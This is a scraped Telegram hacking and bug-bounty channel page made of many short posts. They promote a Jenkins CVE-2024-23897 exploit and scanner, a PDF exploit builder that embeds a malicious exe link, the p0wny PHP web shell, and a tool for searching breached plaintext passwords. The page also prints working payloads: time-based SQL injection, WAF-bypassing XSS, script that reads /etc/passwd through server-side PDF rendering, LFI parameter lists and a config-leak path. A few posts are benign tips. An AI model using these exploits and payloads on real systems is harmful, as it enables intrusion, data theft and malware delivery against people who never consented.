BugCod3 – Telegram
BugCod3
6.23K subscribers
308 photos
5 videos
7 files
406 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: T.me/BugCod3GP
📂 Topic: T.me/BugCod3Topic

🤖 Contact: T.me/BugCod3BOT
📧 Email: BugCod3@protonmail.com
Download Telegram
🦇 CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner 🦇

💬 Denoscription:
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.

💻 Usage:
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.
python CVE-2024-23897.py -t <target> -p <port> -f <file>

or
python CVE-2024-23897.py -i <input_file> -f <file>


📊 Parameters:
⚪️ -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.

⚪️ -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).

⚪️ -o or --output-file: Export results to file (optional).

⚪️ -p or --port: Specify the port number. Default is 8080 (optional).

⚪️ -f or --file: Specify the file to read on the target system.

😸 Github

⬇️ Download
🔒 BugCod3

#CVE #PoC #Scanner

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
43🔥1
10000 h1 disclosed reports

💬
On 31st Dec 2023, I made it my goal to read 10,000 H1 Reports in 2024 Q1 (i.e. first 3 months) to really understand deep down what kind of bugs are being reported, accepted, or rejected and how exactly I should approach my journey in #bugbounty. Also, I thought, there was no better resource than actual disclosed bug reports. Later I decided to cap my goal at *5000* because I think I nailed the common pattern and already accomplished what I wanted to get out of it.

😸 Github

⬇️ Download
🔒 BugCod3

#Python #H1 #Report

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
32🔥1💯1
Google Bug Bounty Dorks Generator

🌎 Site

#BugBounty #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
21👍1🔥1💯1
🕸 DigitalOcean OpenVPN/SOCKS for Burp Suite

💬
This Burp extension allows you to spin up a DigitalOcean droplet based on an OpenVPN configuration file. The droplet also functions as a SOCKS5 proxy to allow routing all Burp traffic through the VPN tunnel. The Burp proxy settings are automatically configured to route traffic through the SOCKS5 and OpenVPN droplet.

👁‍🗨 How to use:
🔤 Download the JAR from build/libs/digitalocean-droplet-openvpn-all.jar or build from source yourself;
🔤 Load the extension in Burp via the Extensions tab;
🔤 Create a DigitalOcean API token and enter your token on the extension tab "OpenVPN/SOCKS";
🔤 Select an OpenVPN configurataion file (.ovpn)
🔤 Click "Deploy" to start deploying the SOCKS and OpenVPN containers on a fresh droplet, and the extension will take care of the rest;
🔤 Allow up to a few minutes for the Docker image to complete installation before the proxy starts responding

📊 Features:
⚪️ Remember your DigitalOcean API token;
⚪️ Remember your OpenVPN configuration file and credentials (optional) per project file;
⚪️ Automatically shut down the droplet when Burp closes or the extension is unloaded;
⚪️ A context menu so you can right-click > enable or disable tunnelling through the VPN
⚪️ Opens a Repeater tab to ifconfig.co to easily verify if the VPN is working correctly

😸 Github

⬇️ Download
🔒 BugCod3

#Burp #Extension #bugbounty

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
31👍1🔥1💯1
𝗫𝗦𝗦 𝗶𝗻 𝘁𝗵𝗲 .𝗰𝘀𝘀 𝗨𝗥𝗟 𝗽𝗮𝘁𝗵

𝗢𝗿𝗶𝗴𝗶𝗻𝗮𝗹 𝗨𝗥𝗟: "target/lib/css/animated.min.css"

𝗫𝗦𝗦 𝗙𝗼𝘂𝗻𝗱 𝗶𝗻:
"/lib/css/animated.min'"/><noscript%20>alert(document.domain)<%2fnoscript>.css"

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍3🔥31💯1
This is very cool. Get cheatsheets in your terminal with a curl command!

⌨️ Try this:
curl https://cht.sh/sqlmap

#Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍31🔥1💯1
💀 LeakSearch 💀

💬
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.

Requirements:
⚪️ Python 3
⚪️ Install requirements pip install -r requirements.txt

💻 Usage:
LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Search #Parse #Password

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥321👍1💯1
🔥 PDF-BUILDER (POC) - (Non Silent) 🔥

💬
POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).

💻 Usage:
Put your exe-link and build the PDF-FILE

😸 Github

⬇️ Download
🔒 BugCod3

#C #PDF #Exploit

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥32👎2
🕷 p0wny@shell:~# -- Single-file PHP Shell 🕷

⚠️ WARNING: THIS SCRIPT IS A SECURITY HOLE. DO NOT UPLOAD IT ON A SERVER UNLESS YOU KNOW WHAT YOU ARE DOING! ⚠️

💬
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this noscript represents a security risk for the server.

📊 Features:
⚪️ Command history (using arrow keys )
⚪️ Auto-completion of command and file names (using Tab key)
⚪️ Navigate on the remote file-system (using cd command)
⚪️ Upload a file to the server (using upload <destination_file_name> command)
⚪️ Download a file from the server (using download <file_name> command)

Demo with Docker:
docker build -t p0wny .
docker run -it -p 8080:80 -d p0wny
# open with your browser http://127.0.0.1:8080/shell.php


😸 Github

⬇️ Download
🔒 BugCod3

#PHP #Shell #Pentesting

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥321
18🤣8
If you find Web frameworks like Symfony, add
'/app_dev.php/_profiler/open?file=app/config/parameters.yml'
to the wordlist, and you may get juicy data.

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥521
Tip for Stored XSS Bypass on Profile Uploader:
+add magic number (jpg , jpeg)
+bypass file extention Protection

Magic Number

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
81👍1
Canarytokens

You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.

Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.

🌐 Site

#Pentesting #BugBounty

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
5
This media is not supported in your browser
VIEW IN TELEGRAM
Translate JavaScript to other writing systems!

Site

ΔYロIᗐコΞ 👾

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
22🔥1
LFI Vulnerability Testing: Key Parameters

?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}

#BugBounty #infosec

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
21🔥1
For 0Day SQLI in

(app extension)

payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
21👍1🔥1
XSS to Exfiltrate Data from PDFs

<noscript>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</noscript><noscript>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</noscript>

How to use:
Server Side XSS (Dynamic PDF)

#XSS #PDF

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥321
┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *1402

┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 1403


#Notification #NewYear

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
51🔥1
If you are testing API, before fuzzing observe these:

1. Does it throw same data for /v1/user and /v1/user

2. Is it case sensitive?

/v1/user => 200 OK

/v1/USER => 200 OK

OR

/v1/user => 200 OK

/v1/User => 404

How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
👍311🔥1
Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
11🔥1